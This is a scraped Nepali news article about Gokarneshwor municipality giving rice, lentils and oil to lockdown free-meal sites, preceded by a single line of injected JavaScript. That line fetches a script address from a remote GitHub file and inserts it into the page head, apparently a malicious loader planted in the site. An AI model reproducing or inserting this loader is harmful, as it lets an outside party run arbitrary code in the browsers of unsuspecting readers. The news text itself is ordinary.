;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);});
काठमाडौँ | गोकर्नेश्वोर नगरपालिकाले नगर भरिका खाना खुवाउने ठाउमा खाद्यान्न वितरण गरि रहेको छ | मिति २०७७ बैशाख २३ गते काठमाडौँ महानगरपालिका र गोकर्नेश्वोर नगरपालिका वडा नं ९ को सिमाना पर्ने आनन्दपुरको स्पोर्ट्स स्पेसल क्लबमा तस्तै गरि गोकर्नेश्वोर नगरपालिका वडा नं ४ उत्तरबाहिनी चोकको खाना खुवाउने ठाउमा ८ बोरा चामल, १ बोरा दाल र तेल प्रदान गरेको हो|
लक डाउनको समयमा गोकर्नेश्वोर नगरपालिकाका मजदुर तथा बिपन्न बर्गहरुले बिभिन्ना स्थानमा खाना खाइ रहेका छन् | नगरपालिका भरिमा लगभग १४ हजार जनाले खाना खाने गरेका मेयर चालिसेले बताए |
नगरपालिकाले यस अघि पनि प्रत्यक खाना खुवाउने ठाउमा मेयर आफै पुगेर खाद्यान्न प्रदान गरेका थिए |
फेसबुक प्रतिक्रियाहरु